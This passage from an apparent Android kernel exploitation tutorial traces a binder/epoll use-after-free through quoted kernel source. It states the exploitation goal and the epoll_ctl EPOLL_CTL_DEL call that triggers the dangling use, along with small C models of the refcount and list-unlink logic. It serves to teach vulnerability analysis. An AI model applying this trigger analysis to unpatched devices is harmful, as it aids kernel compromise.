- Calls `binder_free_thread`, passing the `binder_thread` pointer.

static void binder_free_thread(struct binder_thread *thread)

{

BUG_ON(!list_empty(&thread->todo));

binder_stats_deleted(BINDER_STAT_THREAD);

binder_proc_dec_tmpref(thread->proc);

kfree(thread);

}

- Calls `kfree`, which frees the kernel heap chunk that holds the `binder_thread` structure.
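The free path above comes down to one rule: the object is freed only once it has been marked dead and its temporary reference count has dropped to zero. The following user-space sketch models that rule in plain C. `model_thread`, `model_release`, and `model_dec_tmpref` are hypothetical stand-ins, not kernel code, and locking is left out.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdlib.h>

struct model_thread {
    int tmp_ref;    /* stands in for atomic_t tmp_ref */
    bool is_dead;   /* set once the thread has been released */
    bool *freed;    /* observation hook: set to true when the object is freed */
};

static struct model_thread *model_thread_new(bool *freed_flag)
{
    struct model_thread *t = calloc(1, sizeof(*t));
    if (t) {
        t->freed = freed_flag;
        *freed_flag = false;
    }
    return t;
}

/* Models binder_thread_dec_tmpref(): drop a ref, free when dead and unreferenced. */
static void model_dec_tmpref(struct model_thread *t)
{
    t->tmp_ref--;
    if (t->is_dead && t->tmp_ref == 0) {
        *t->freed = true;
        free(t);    /* corresponds to kfree(thread) in binder_free_thread() */
    }
}

/* Models the reference handling in binder_thread_release(). */
static void model_release(struct model_thread *t)
{
    t->tmp_ref++;   /* keep the object alive while it is being released */
    t->is_dead = true;
    model_dec_tmpref(t);
}

/* Returns 1 if releasing an otherwise unreferenced thread frees it. */
static int model_release_frees_idle_thread(void)
{
    bool freed;
    struct model_thread *t = model_thread_new(&freed);
    assert(t != NULL);
    model_release(t);
    return freed ? 1 : 0;
}

/* Returns 1 if an extra reference delays the free until it is dropped. */
static int model_extra_ref_delays_free(void)
{
    bool freed;
    struct model_thread *t = model_thread_new(&freed);
    assert(t != NULL);
    t->tmp_ref++;          /* e.g. a transaction still holds the thread */
    model_release(t);
    if (freed)
        return 0;          /* the object must still be alive here */
    model_dec_tmpref(t);   /* the last reference goes away */
    return freed ? 1 : 0;
}
```

Nothing in this rule accounts for the epoll wait-queue entry that still points into the object, so the free can happen while epoll keeps its pointer.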

ep_remove

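- The stack trace in the Use section shows that `ep_unregister_pollwait` was called while the `exit_group` system call was executing. `exit_group` is normally called when a process exits.
- During exploitation, the goal is to call `ep_unregister_pollwait` at a time of our choosing.
- To find a way to do that, we searched eventpoll.c for the functions that call it.
- That search turned up an interesting function, `ep_remove`. It is a good candidate because it is reached from the `epoll_ctl` system call when `EPOLL_CTL_DEL` is passed as the operation.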

/*

* The following function implements the controller interface for

* the eventpoll file that enables the insertion/removal/change of

* file descriptors inside the interest set.

*/

SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,

struct epoll_event __user *, event)

{

int error;

int full_check = 0;

struct fd f, tf;

struct eventpoll *ep;

struct epitem *epi;

struct epoll_event epds;

struct eventpoll *tep = NULL;

error = -EFAULT;

if (ep_op_has_event(op) &&

copy_from_user(&epds, event, sizeof(struct epoll_event)))

goto error_return;

error = -EBADF;

f = fdget(epfd);

if (!f.file)

goto error_return;

/* Get the "struct file *" for the target file */

tf = fdget(fd);

if (!tf.file)

goto error_fput;

/* The target file descriptor must support poll */

error = -EPERM;

if (!tf.file->f_op->poll)

goto error_tgt_fput;

/* Check if EPOLLWAKEUP is allowed */

if (ep_op_has_event(op))

ep_take_care_of_epollwakeup(&epds);

/*

* We have to check that the file structure underneath the file descriptor

* the user passed to us _is_ an eventpoll file. And also we do not permit

* adding an epoll file descriptor inside itself.

*/

error = -EINVAL;

if (f.file == tf.file || !is_file_epoll(f.file))

goto error_tgt_fput;

/*

* epoll adds to the wakeup queue at EPOLL_CTL_ADD time only,

* so EPOLLEXCLUSIVE is not allowed for a EPOLL_CTL_MOD operation.

* Also, we do not currently supported nested exclusive wakeups.

*/

if (ep_op_has_event(op) && (epds.events & EPOLLEXCLUSIVE)) {

if (op == EPOLL_CTL_MOD)

goto error_tgt_fput;

if (op == EPOLL_CTL_ADD && (is_file_epoll(tf.file) ||

(epds.events & ~EPOLLEXCLUSIVE_OK_BITS)))

goto error_tgt_fput;

}

/*

* At this point it is safe to assume that the "private_data" contains

* our own data structure.

*/

ep = f.file->private_data;

/*

* When we insert an epoll file descriptor, inside another epoll file

* descriptor, there is the change of creating closed loops, which are

* better be handled here, than in more critical paths. While we are

* checking for loops we also determine the list of files reachable

* and hang them on the tfile_check_list, so we can check that we

* haven't created too many possible wakeup paths.

*

* We do not need to take the global 'epumutex' on EPOLL_CTL_ADD when

* the epoll file descriptor is attaching directly to a wakeup source,

* unless the epoll file descriptor is nested. The purpose of taking the

* 'epmutex' on add is to prevent complex toplogies such as loops and

* deep wakeup paths from forming in parallel through multiple

* EPOLL_CTL_ADD operations.

*/

mutex_lock_nested(&ep->mtx, 0);

if (op == EPOLL_CTL_ADD) {

if (!list_empty(&f.file->f_ep_links) ||

is_file_epoll(tf.file)) {

full_check = 1;

mutex_unlock(&ep->mtx);

mutex_lock(&epmutex);

if (is_file_epoll(tf.file)) {

error = -ELOOP;

if (ep_loop_check(ep, tf.file) != 0) {

clear_tfile_check_list();

goto error_tgt_fput;

}

} else

list_add(&tf.file->f_tfile_llink,

&tfile_check_list);

mutex_lock_nested(&ep->mtx, 0);

if (is_file_epoll(tf.file)) {

tep = tf.file->private_data;

mutex_lock_nested(&tep->mtx, 1);

}

}

}

/*

* Try to lookup the file inside our RB tree, Since we grabbed "mtx"

* above, we can be sure to be able to use the item looked up by

* ep_find() till we release the mutex.

*/

epi = ep_find(ep, tf.file, fd);

error = -EINVAL;

switch (op) {

case EPOLL_CTL_ADD:

if (!epi) {

epds.events |= POLLERR | POLLHUP;

error = ep_insert(ep, &epds, tf.file, fd, full_check);

} else

error = -EEXIST;

if (full_check)

clear_tfile_check_list();

break;

case EPOLL_CTL_DEL:

if (epi)

error = ep_remove(ep, epi);

else

error = -ENOENT;

break;

case EPOLL_CTL_MOD:

if (epi) {

if (!(epi->event.events & EPOLLEXCLUSIVE)) {

epds.events |= POLLERR | POLLHUP;

error = ep_modify(ep, epi, &epds);

}

} else

error = -ENOENT;

break;

}

if (tep != NULL)

mutex_unlock(&tep->mtx);

mutex_unlock(&ep->mtx);

error_tgt_fput:

if (full_check)

mutex_unlock(&epmutex);

fdput(tf);

error_fput:

fdput(f);

error_return:

return error;

}

epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);

Passing `EPOLL_CTL_DEL` as the operation lets us reach `ep_unregister_pollwait` through `ep_remove`.

/*

* Removes a "struct epitem" from the eventpoll RB tree and deallocates

* all the associated resources. Must be called with "mtx" held.

*/

static int ep_remove(struct eventpoll *ep, struct epitem *epi)

{

unsigned long flags;

struct file *file = epi->ffd.file;

/*

* Removes poll wait queue hooks. We _have_ to do this without holding

* the "ep->lock" otherwise a deadlock might occur. This because of the

* sequence of the lock acquisition. Here we do "ep->lock" then the wait

* queue head lock when unregistering the wait queue. The wakeup callback

* will run by holding the wait queue head lock and will call our callback

* that will try to get "ep->lock".

*/

ep_unregister_pollwait(ep, epi);

/* Remove the current item from the list of epoll hooks */

spin_lock(&file->f_lock);

list_del_rcu(&epi->fllink);

spin_unlock(&file->f_lock);

rb_erase_cached(&epi->rbn, &ep->rbr);

spin_lock_irqsave(&ep->lock, flags);

if (ep_is_linked(&epi->rdllink))

list_del_init(&epi->rdllink);

spin_unlock_irqrestore(&ep->lock, flags);

wakeup_source_unregister(ep_wakeup_source(epi));

/*

* At this point it is safe to free the eventpoll item. Use the union

* field epi->rcu, since we are trying to minimize the size of

* 'struct epitem'. The 'rbn' field is no longer in use. Protected by

* ep->mtx. The rcu read side, reverse_path_check_proc(), does not make

* use of the rbn field.

*/

call_rcu(&epi->rcu, epi_rcu_free);

atomic_long_dec(&ep->user->epoll_watches);

return 0;

}

- Calls `ep_unregister_pollwait`, passing the `eventpoll` and `epitem` pointers.

/*

* This function unregisters poll callbacks from the associated file

* descriptor. Must be called with "mtx" held (or "epmutex" if called from

* ep_free).

*/

static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi)

{

struct list_head *lsthead = &epi->pwqlist;

struct eppoll_entry *pwq;

while (!list_empty(lsthead)) {

pwq = list_first_entry(lsthead, struct eppoll_entry, llink);

list_del(&pwq->llink);

ep_remove_wait_queue(pwq);

kmem_cache_free(pwq_cache, pwq);

}

}

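- Gets the `list_head` pointer of the poll wait queue from `epi->pwqlist`.
- Gets the `eppoll_entry` pointer from the first `llink` node on that list. `llink` is the `struct list_head` member embedded in `eppoll_entry`.
- Calls `ep_remove_wait_queue`, passing the `eppoll_entry` pointer.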
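`list_first_entry` works because the `list_head` is embedded inside the containing structure, so the address of the container can be recovered by subtracting the member's offset. A minimal user-space sketch of that idea follows. The `my_`-prefixed names and the simplified `my_eppoll_entry` layout are hypothetical and only mimic the kernel macros.

```c
#include <assert.h>
#include <stddef.h>

struct my_list_head { struct my_list_head *next, *prev; };

/* Recover the enclosing struct from a pointer to one of its members. */
#define my_container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* First element of a list: the container of head->next. */
#define my_list_first_entry(head, type, member) \
    my_container_of((head)->next, type, member)

/* Simplified stand-in for struct eppoll_entry. */
struct my_eppoll_entry {
    int id;                      /* illustrative payload */
    struct my_list_head llink;   /* links the entry into the pwqlist */
};

/* Builds a one-element list and returns the id found through the macro. */
static int first_entry_id(void)
{
    struct my_list_head pwqlist;
    struct my_eppoll_entry pwq = { .id = 42 };
    struct my_eppoll_entry *found;

    /* head <-> pwq.llink, linked as a circle */
    pwqlist.next = pwqlist.prev = &pwq.llink;
    pwq.llink.next = pwq.llink.prev = &pwqlist;

    found = my_list_first_entry(&pwqlist, struct my_eppoll_entry, llink);
    assert(found == &pwq);
    return found->id;
}
```

The list itself only stores pointers to `llink` members; the macro is what turns such a pointer back into the `eppoll_entry` that `ep_remove_wait_queue` receives.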

static void ep_remove_wait_queue(struct eppoll_entry *pwq)

{

wait_queue_head_t *whead;

rcu_read_lock();

/*

* If it is cleared by POLLFREE, it should be rcu-safe.

* If we read NULL we need a barrier paired with

* smp_store_release() in ep_poll_callback(), otherwise

* we rely on whead->lock.

*/

whead = smp_load_acquire(&pwq->whead);

if (whead)

remove_wait_queue(whead, &pwq->wait);

rcu_read_unlock();

}

- Gets the `wait_queue_head_t` pointer from `eppoll_entry->whead`.
- Calls `remove_wait_queue`, passing that `wait_queue_head_t` pointer and `eppoll_entry->wait`.

Note: `eppoll_entry->whead` and `eppoll_entry->wait` both hold references to the dangling `binder_thread`.

void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)

{

unsigned long flags;

spin_lock_irqsave(&wq_head->lock, flags);

__remove_wait_queue(wq_head, wq_entry);

spin_unlock_irqrestore(&wq_head->lock, flags);

}

- Calls `spin_lock_irqsave` on `wait_queue_head->lock` to take the lock.

Note: As the stack trace in the Use section shows, the crash occurs in `spin_lock_irqsave` because of the dangling pointer. This is the first place where the dangling chunk is used.

- Calls `__remove_wait_queue`, passing `wait_queue_head` and `wait_queue_entry`.

static inline void

__remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)

{

list_del(&wq_entry->entry);

}

- Calls `list_del`, passing `wait_queue_entry->entry`, which is a `struct list_head`.

Note: `wait_queue_head` is ignored here and is not used afterwards.

Let’s open workshop/android-4.14-dev/goldfish/include/linux/list.h and follow list_del function to figure out what it does.

/*

* Delete a list entry by making the prev/next entries

* point to each other.

*

* This is only for internal list manipulation where we know

* the prev/next entries already!

*/

static inline void __list_del(struct list_head * prev, struct list_head * next)

{

next->prev = prev;

WRITE_ONCE(prev->next, next);

}

static inline void list_del(struct list_head *entry)

{

__list_del(entry->prev, entry->next);

entry->next = LIST_POISON1;

entry->prev = LIST_POISON2;

}

- This is an ordinary unlink operation. It writes a pointer to `binder_thread->wait.head` into both `binder_thread->wait.head.next` and `binder_thread->wait.head.prev`, which unlinks `eppoll_entry->wait.entry` from `binder_thread->wait.head`.





The diagrams in this section help show how a circular doubly linked list works.

First, consider what a single initialized node looks like. Here node1 is `binder_thread->wait.head` and node2 is `eppoll_entry->wait.entry`.



Only node1 and node2 are linked together in the circle.

When node2 is unlinked, both the next and prev pointers of node1 end up pointing back at node1 itself.
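The unlink can be reproduced in user space. The sketch below assumes simplified, hypothetical copies of the list helpers (`dl_init`, `dl_add`, `dl_del`, with pointer poisoning omitted) rather than the kernel's own. It links node1 and node2 into a circle and then deletes node2. Afterwards both pointers of node1 hold node1's own address, which in the bug scenario means a pointer to `binder_thread->wait.head` is written into the freed `binder_thread` chunk.

```c
#include <assert.h>
#include <stdbool.h>

struct dl_node { struct dl_node *next, *prev; };

/* An initialized node points at itself in both directions. */
static void dl_init(struct dl_node *h)
{
    h->next = h;
    h->prev = h;
}

/* Insert new_node right after head (same effect as list_add). */
static void dl_add(struct dl_node *new_node, struct dl_node *head)
{
    new_node->next = head->next;
    new_node->prev = head;
    head->next->prev = new_node;
    head->next = new_node;
}

/* Same pointer updates as __list_del(entry->prev, entry->next). */
static void dl_del(struct dl_node *entry)
{
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
}

/* Returns true if node1 points at itself both ways after node2 is unlinked. */
static bool unlink_leaves_self_pointers(void)
{
    struct dl_node node1;   /* plays binder_thread->wait.head */
    struct dl_node node2;   /* plays eppoll_entry->wait.entry */

    dl_init(&node1);
    dl_add(&node2, &node1);
    assert(node1.next == &node2 && node1.prev == &node2);

    dl_del(&node2);
    return node1.next == &node1 && node1.prev == &node1;
}
```

In this model node1 is a live stack variable, so the two writes are harmless. In the kernel the same two writes land in memory that has already been returned to the allocator.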

Static Analysis Recap

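Let's answer the questions we started with.

- Why is `binder_thread` allocated?

`ep_insert` calls `ep_item_poll`, which calls `binder_poll`. `binder_poll`, through `binder_get_thread`, looks up the thread in the red-black tree and allocates a new `binder_thread` if none is found.

- Why is `binder_thread` freed?

It is freed when `ioctl` is explicitly called with `BINDER_THREAD_EXIT`.

- Why is the freed `binder_thread` used?

The pointers in `eppoll_entry->whead` and `eppoll_entry->wait.entry` that refer to `binder_thread->wait.head` are not cleared when the `binder_thread` is freed. When the epoll entry is later removed by calling `epoll_ctl` with `EPOLL_CTL_DEL`, the kernel tries to use the dangling `binder_thread`.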

Dynamic Analysis

…